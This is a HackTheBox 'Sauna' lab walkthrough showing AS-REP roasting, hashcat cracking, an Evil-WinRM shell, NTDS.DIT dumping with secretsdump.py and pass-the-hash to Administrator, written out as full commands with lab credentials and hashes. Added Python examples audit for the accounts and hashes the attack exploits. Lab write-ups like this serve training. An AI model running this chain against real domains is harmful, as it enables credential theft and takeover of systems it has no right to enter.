HackTheBox - Sauna Walkthrough

Sauna focused on Active Directory enumeration and the use of AS-REP roasting to recover a crack-able user hash. Other hashes were able to be dumped from the NTDS.DIT file and used in a pass-the-hash authentication to achieve Administrator access.

Introduction


OS: Windows

Difficulty: Easy

Points: 20

Release: 15 Feb 2020

IP: 10.10.10.175

Recon

We start off with a basic nmap scan of the top 1000 ports, plus service and OS discovery.

nmap -A -sC -sV 10.10.10.175

Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-25 21:04 CDT
Nmap scan report for 10.10.10.175
Host is up (0.069s latency).
Not shown: 988 filtered ports
PORT     STATE SERVICE       VERSION

53/tcp   open  domain?
| fingerprint-strings: 
|   DNSVersionBindReqTCP: 
|     version
|_    bind

80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home

88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-06-26 09:08:53Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped

1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=6/25%Time=5EF557A8%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h04m34s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2020-06-26T09:11:12
|_  start_date: N/A
                                                                                                                                                                                                                                           
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 308.46 seconds

Quick Observations

  • We immediately confirm that this is a Windows machine and very likely a Domain Controller, given the Kerberos service on TCP/88 and LDAP on TCP/389.
  • We have a domain name: EGOTISTICAL-BANK
  • We can see that SMB has message signing enforced so this won't be vulnerable to pass-the-hash / relay attacks.

Website Enumeration

  • There is a website on TCP/80 with the title "Egotistical Bank".

There is a teams page on the website that contains several full names. I decided to create a list of possible usernames from these names based on common sysadmin naming schemes:

fergus
fsmith
ferguss
fergus.smith
hugo
hbear
hugob
hugo.bear
skerb
steven
stevenk
steven.kerb
scoins
shaunc
shaun
shaun.coins
btaylor
bowiet
bowie
bowie.taylor
sdriver
sophied
sophie.driver
sophie
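
The list above was written by hand from four naming schemes (first name, first initial + last name, first name + last initial, first.last). The following is an added example, not code from the original walkthrough, that applies those same four schemes as a function so the same list can be built for any team page; TEAM_NAMES is constructed here to match the names behind the list above. From the defender's side it makes the point explicit: whatever a public staff page reveals about naming becomes a ready-made username list.

```python
# Added example: it is not code from the original walkthrough. It reproduces,
# as a function, the four naming schemes the hand-written list above uses
# (first name, first initial + last name, first name + last initial,
# first.last) so the scheme can be applied to any team page.
# TEAM_NAMES is constructed to match the names behind the list above.
TEAM_NAMES = [
    "Fergus Smith",
    "Hugo Bear",
    "Steven Kerb",
    "Shaun Coins",
    "Bowie Taylor",
    "Sophie Driver",
]


def candidates(full_name):
    """Return the candidate usernames for one 'First Last' name.

    Names with middle names or initials are reduced to their first and
    last tokens; anything that is not a letter is dropped so that
    "O'Brien" becomes "obrien".
    """
    parts = [
        "".join(ch for ch in p if ch.isalpha()).lower()
        for p in full_name.split()
    ]
    parts = [p for p in parts if p]
    if len(parts) < 2:
        return parts  # a single token can only be used as-is
    first, last = parts[0], parts[-1]
    return [first, first[0] + last, first + last[0], f"{first}.{last}"]


def build_user_list(names):
    """Flatten the candidates for every name, keeping first-seen order and
    dropping duplicates (two people called Sam Smith would both give
    'ssmith')."""
    seen, out = set(), []
    for name in names:
        for user in candidates(name):
            if user not in seen:
                seen.add(user)
                out.append(user)
    return out


if __name__ == "__main__":
    # Writes the same kind of file the walkthrough feeds to GetNPUsers.py.
    with open("ad_usernames.txt", "w") as fh:
        fh.write("\n".join(build_user_list(TEAM_NAMES)) + "\n")
```

Running it against TEAM_NAMES yields exactly the 24 entries listed above, in the same per-person grouping.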

Nothing of interest was found in a quick gobuster scan: gobuster dir -u http://10.10.10.175/ -w /usr/share/wordlists/dirb/common.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.175/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/06/26 09:51:14 Starting gobuster
===============================================================
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/Images (Status: 301)
/index.html (Status: 200)
===============================================================
2020/06/26 09:51:42 Finished
===============================================================

Note: It's also possible to use tools such as kerbrute to build a user list instead of what I've done manually above!

Active Directory Enumeration

I started searching around for information about Kerberos pre-auth attacks, and found an excellent video explaining GetNPUsers.py.

Hosts file entries were created to make the tooling easier to use:

/etc/hosts

# HTB
10.10.10.175 EGOTISTICALBANK
10.10.10.175 EGOTISTICAL-BANK.LOCAL

You can just run GetNPUsers.py with the -dc-ip argument to bypass the need for local name resolution. Adding hosts entries is simply a habit of mine that simplifies the attacks going forward.

An AS-REP roasting attack was attempted using GetNPUsers.py.

AS-REP Roasting

The file ad_usernames.txt is the compilation of usernames derived from the teams page on the website.

GetNPUsers.py EGOTISTICALBANK/ -usersfile ad_usernames.txt -format hashcat -outputfile hashes.asreproast

Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
...

**$ ls**
ad_usernames.txt  hashes.asreproast 
**$ cat hashes.asreproast**
[email protected]:4b9d4497a7d50fe6d990476dc2af2dee$9f6c5c277b367323331d15f542dac8206cfe6f81731389c5984e6d515cba3f8ae120ae50a6e75ba330edb36bfe5341a7cf8616bd18148de31700162b45a1ae12f6cb448075f8d1b6d1f6448309de26d5c4072d9e68879fb97fdfd5b3421e55b2c433ff41730f46cecadad13dcc78c4bf6950db0101a5eda5584b6a84574732d6b346c1d87257af1209a803c11366ec7f28219309597b984c4c409ebaf465f98a2519ce466b5484a9c4a8391b89bb55a05a1187ee26ccabde0012485f0282a126cbfb5aff3ec817f2c93616369f2837567e3d85c50f650f13c96f55834491b88731888e4fbdf5f38d6bbb1909413495c3c894418263b28db885
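
GetNPUsers.py only gets a hash back for accounts that have Kerberos pre-authentication switched off, which is the DONT_REQ_PREAUTH bit (0x400000, decimal 4194304) of userAccountControl. For such an account the KDC returns an AS-REP whose encrypted part is keyed from the user's password before the client has proven it knows that password, which is what makes the offline dictionary attack possible. The following is an added example, not code from the walkthrough or from impacket, that audits user records for that bit; the SAMPLE_USERS records are constructed data in the shape an LDAP search returns, not Sauna's directory.

```python
# Added example: not code from the original walkthrough or from impacket.
# AS-REP roasting only works against accounts whose userAccountControl has
# the DONT_REQ_PREAUTH bit set. Auditing for that bit is the defender's check.
# The user records below are constructed sample data, not Sauna's directory.

# userAccountControl flag bits (values defined by Active Directory)
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH = 0x400000  # decimal 4194304

UAC_FLAGS = {
    "ACCOUNTDISABLE": ACCOUNTDISABLE,
    "NORMAL_ACCOUNT": NORMAL_ACCOUNT,
    "DONT_EXPIRE_PASSWORD": DONT_EXPIRE_PASSWORD,
    "DONT_REQ_PREAUTH": DONT_REQ_PREAUTH,
}

# The equivalent server-side LDAP filter (1.2.840.113556.1.4.803 is the
# LDAP_MATCHING_RULE_BIT_AND matching rule), usable with any LDAP client.
PREAUTH_DISABLED_FILTER = (
    "(&(objectCategory=person)(objectClass=user)"
    f"(userAccountControl:1.2.840.113556.1.4.803:={DONT_REQ_PREAUTH}))"
)

SAMPLE_USERS = [  # constructed records in the shape an LDAP search returns
    {"sAMAccountName": "fsmith", "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH},
    {"sAMAccountName": "hsmith", "userAccountControl": NORMAL_ACCOUNT},
    {"sAMAccountName": "svc_loanmgr", "userAccountControl": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD},
    {"sAMAccountName": "oldsvc", "userAccountControl": NORMAL_ACCOUNT | DONT_REQ_PREAUTH | ACCOUNTDISABLE},
]


def decode_uac(value):
    """Names of the known flag bits set in a userAccountControl value."""
    return [name for name, bit in UAC_FLAGS.items() if value & bit]


def preauth_disabled(users, include_disabled=False):
    """sAMAccountNames whose Kerberos pre-authentication is switched off.

    Disabled accounts are skipped by default: the KDC refuses them with
    KDC_ERR_CLIENT_REVOKED, so they cannot be roasted, though they are still
    worth cleaning up.
    """
    found = []
    for u in users:
        uac = u["userAccountControl"]
        if not uac & DONT_REQ_PREAUTH:
            continue
        if uac & ACCOUNTDISABLE and not include_disabled:
            continue
        found.append(u["sAMAccountName"])
    return found


if __name__ == "__main__":
    print("LDAP filter:", PREAUTH_DISABLED_FILTER)
    for u in SAMPLE_USERS:
        if u["sAMAccountName"] in preauth_disabled(SAMPLE_USERS, include_disabled=True):
            print(u["sAMAccountName"], decode_uac(u["userAccountControl"]))
```

Against a live domain the same check is Get-ADUser -Filter 'DoesNotRequirePreAuth -eq $true' from the ActiveDirectory PowerShell module, or the LDAP filter above with any client; every account it returns is one that GetNPUsers.py would hand a crackable AS-REP for.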

Cracking the hash for user fsmith using hashcat

Hash for user: fsmith

[email protected]:4b9d4497a7d50fe6d990476dc2af2dee$9f6c5c277b367323331d15f542dac8206cfe6f81731389c5984e6d515cba3f8ae120ae50a6e75ba330edb36bfe5341a7cf8616bd18148de31700162b45a1ae12f6cb448075f8d1b6d1f6448309de26d5c4072d9e68879fb97fdfd5b3421e55b2c433ff41730f46cecadad13dcc78c4bf6950db0101a5eda5584b6a84574732d6b346c1d87257af1209a803c11366ec7f28219309597b984c4c409ebaf465f98a2519ce466b5484a9c4a8391b89bb55a05a1187ee26ccabde0012485f0282a126cbfb5aff3ec817f2c93616369f2837567e3d85c50f650f13c96f55834491b88731888e4fbdf5f38d6bbb1909413495c3c894418263b28db885

hashcat.exe -m18200 "[email protected]:4b9d4497a7d50fe6d990476dc2af2dee$9f6c5c277b367323331d15f542dac8206cfe6f81731389c5984e6d515cba3f8ae120ae50a6e75ba330edb36bfe5341a7cf8616bd18148de31700162b45a1ae12f6cb448075f8d1b6d1f6448309de26d5c4072d9e68879fb97fdfd5b3421e55b2c433ff41730f46cecadad13dcc78c4bf6950db0101a5eda5584b6a84574732d6b346c1d87257af1209a803c11366ec7f28219309597b984c4c409ebaf465f98a2519ce466b5484a9c4a8391b89bb55a05a1187ee26ccabde0012485f0282a126cbfb5aff3ec817f2c93616369f2837567e3d85c50f650f13c96f55834491b88731888e4fbdf5f38d6bbb1909413495c3c894418263b28db885" -a 0 rockyou.txt

hashcat (v6.0.0) starting...

* Device #1: CUDA SDK Toolkit installation NOT detected.
             CUDA SDK Toolkit installation required for proper device support and utilization
             Falling back to OpenCL Runtime

* Device #1: WARNING! Kernel exec timeout is not disabled.
             This may cause "CL_OUT_OF_RESOURCES" or related errors.
             To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL API (OpenCL 1.2 CUDA 11.0.140) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #1: GeForce RTX 2080, 5696/8192 MB (2048 MB allocatable), 46MCU

[..]

Dictionary cache built:
* Filename..: rockyou.txt
* Passwords.: 14344394
* Bytes.....: 139921525
* Keyspace..: 14344387
* Runtime...: 1 sec

[email protected]:4b9d4497a7d50fe6d990476dc2af2dee$9f6c5c277b367323331d15f542dac8206cfe6f81731389c5984e6d515cba3f8ae120ae50a6e75ba330edb36bfe5341a7cf8616bd18148de31700162b45a1ae12f6cb448075f8d1b6d1f6448309de26d5c4072d9e68879fb97fdfd5b3421e55b2c433ff41730f46cecadad13dcc78c4bf6950db0101a5eda5584b6a84574732d6b346c1d87257af1209a803c11366ec7f28219309597b984c4c409ebaf465f98a2519ce466b5484a9c4a8391b89bb55a05a1187ee26ccabde0012485f0282a126cbfb5aff3ec817f2c93616369f2837567e3d85c50f650f13c96f55834491b88731888e4fbdf5f38d6bbb1909413495c3c894418263b28db885:**Thestrokes23**

Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, AS-REP
Hash.Target......: [email protected]:4b9d4497a7d50f...8db885
Time.Started.....: Fri Jun 26 10:52:16 2020 (1 sec)
Time.Estimated...: Fri Jun 26 10:52:17 2020 (0 secs)
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 10760.2 kH/s (5.51ms) @ Accel:256 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests
Progress.........: 10551296/14344387 (73.56%)
Rejected.........: 0/10551296 (0.00%)
Restore.Point....: 9797632/14344387 (68.30%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: bamm24 -> TUGGAB8
Hardware.Mon.#1..: Temp: 57c Fan:  5% Util: 19% Core:1935MHz Mem:7000MHz Bus:16

Started: Fri Jun 26 10:52:06 2020
Stopped: Fri Jun 26 10:52:19 2020

SMB Enumeration

(This was a dead-end)

Now that we have a credential for user fsmith, let's investigate SMB.

smbmap -u fsmith -p Thestrokes23 -d EGOTISTICALBANK -H 10.10.10.175

[+] IP: 10.10.10.175:445        Name: EGOTISTICALBANK
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share
        print$                                                  READ ONLY       Printer Drivers
        RICOH Aficio SP 8300DN PCL 6                            NO ACCESS       We cant print money
        SYSVOL                                                  READ ONLY       Logon server share

  • We lack permissions to get any files on SMB.
  • PsExec/WMI over SMB doesn't seem to work. 😢

Exploitation

Acquiring a user shell with Evil-WinRM

evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\FSmith\Documents> ls
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> ls

    Directory: C:\Users\FSmith\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        1/23/2020  10:03 AM             34 user.txt

Enumerating other users on the machine

Directory: C:\Users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        1/25/2020   1:05 PM                Administrator
d-----        1/23/2020   9:52 AM                FSmith
d-r---        1/22/2020   9:32 PM                Public
d-----        1/24/2020   4:05 PM                svc_loanmgr

Privilege Escalation

At this point I usually run winPEAS or a similar script to start looking for privilege escalation. For this particular box, with its strong focus on AD, I wanted to use secretsdump.py (another script in the impacket suite) to dump the hashes from the NTDS.DIT file using the DRSUAPI method (Directory Replication Service API).

secretsdump.py EGOTISTICALBANK/svc_loanmgr:Moneymakestheworldgoround\\[email protected]


Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:1678e6d4d0797087aa622ac4a5f11f4b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
Administrator:aes128-cts-hmac-sha1-96:145e4d0e4a6600b7ec0ece74997651d0
Administrator:des-cbc-md5:19d5f15d689b1ce5
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:c6a5b80d2ab44c629a90bb0246bf4521afbaec4cefe930fe2623ecba55d9349f
SAUNA$:aes128-cts-hmac-sha1-96:5bd1f2bd156d1fbed58a3955ff9c4b34
SAUNA$:des-cbc-md5:2f29ced334b05e7c
[*] Cleaning up...

We recovered an NTLM hash for the Administrator user!

  • Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
  • We know that the hash to crack is the 4th colon-delimited field, which is d9485863c1e9e05851aa40cbb4ab9dff
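
The secretsdump output format is domain\uid:rid:lmhash:nthash:::, so pulling the NT hash out is a matter of splitting on the fourth colon-separated field. The following is an added example, not code from the walkthrough or from impacket, that parses those lines and runs the checks a defender would run over such a dump: accounts sharing an NT hash (so sharing a password), accounts carrying the empty-password hash, and whether LM hashes are still stored. Its sample input is the dump shown above; run over those lines it also surfaces that HSmith and FSmith have identical NT hashes, something the dump shows but the walkthrough does not call out.

```python
# Added example: not code from the original walkthrough or from impacket.
# Parses secretsdump.py's "domain\uid:rid:lmhash:nthash:::" lines, pulls
# out the NT hash (the fourth colon-separated field, as noted above) and
# then runs the checks a defender would run over such a dump.
import re
from collections import defaultdict

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of an empty string
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of an empty string

# Sample input: lines copied from the dump shown above (status and
# Kerberos-key lines included on purpose, to show they are skipped).
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d9485863c1e9e05851aa40cbb4ab9dff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:1678e6d4d0797087aa622ac4a5f11f4b:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:987e26bb845e57df4c7301753f6cb53fcf993e1af692d08fd07de74f041bf031
"""

# The domain prefix is optional (built-in accounts have none); the trailing
# ":::" is the empty extra fields secretsdump always emits.
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:\\]+):(?P<rid>\d+)"
    r":(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$"
)


def parse_dump(text):
    """Keep only the NTDS hash lines; status and Kerberos-key lines are skipped."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            e = m.groupdict()
            e["rid"] = int(e["rid"])
            entries.append(e)
    return entries


def nt_hash_for(entries, user):
    """NT hash for one account (case-insensitive), or None if absent."""
    for e in entries:
        if e["user"].lower() == user.lower():
            return e["nt"]
    return None


def shared_hashes(entries):
    """NT hash -> accounts using it, for hashes used by more than one account."""
    groups = defaultdict(list)
    for e in entries:
        groups[e["nt"]].append(e["user"])
    return {h: users for h, users in groups.items() if len(users) > 1}


def empty_password_accounts(entries):
    """Accounts whose NT hash is that of "" (expected for a disabled Guest,
    a finding for anything else)."""
    return [e["user"] for e in entries if e["nt"] == EMPTY_NT]


def lm_hash_stored(entries):
    """Accounts that still carry a real LM hash; empty when NoLMHash is in force."""
    return [e["user"] for e in entries if e["lm"] != EMPTY_LM]


if __name__ == "__main__":
    entries = parse_dump(SAMPLE_DUMP)
    print("Administrator NT hash:", nt_hash_for(entries, "Administrator"))
    print("shared NT hashes:", shared_hashes(entries))
    print("empty-password accounts:", empty_password_accounts(entries))
    print("LM hashes stored for:", lm_hash_stored(entries))
```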

I was unable to crack this password using hashcat and the rockyou.txt wordlist (hashcat.exe -m1000 -a 0 "d9485863c1e9e05851aa40cbb4ab9dff" rockyou.txt)

Fortunately for us, Evil-WinRM allows us to authenticate using pass-the-hash. Below is a good video on the subject of NTLM PtH.

Pass the Hash, Part III: How NTLM Will Get You Hacked
The most important takeaway about PtH is that the password hashes that are stored in memory (and grabbed by hackers) are a feature of Single Sign On.

An Administrator shell is one command away now: evil-winrm -i 10.10.10.175 -u Administrator -H d9485863c1e9e05851aa40cbb4ab9dff


Summary

  1. Enumerating the website's teams page provided us with a list of full names from which we could deduce possible usernames (e.g. "Frank Smith" ⇒ "fsmith").
  2. An AS-REP roasting attack was performed with GetNPUsers.py against the EGOTISTICAL-BANK domain discovered in the nmap scan, using the username list we created in step one.
  3. hashcat was used to crack the hash we recovered for the user fsmith.
  4. With our new credentials, we were able to acquire a user shell using Evil-WinRM.
  5. The hash for Administrator inside NTDS.DIT was dumped using secretsdump.py, taking advantage of the Directory Replication Service API.
  6. A shell as Administrator was acquired using pass-the-hash authentication with Evil-WinRM.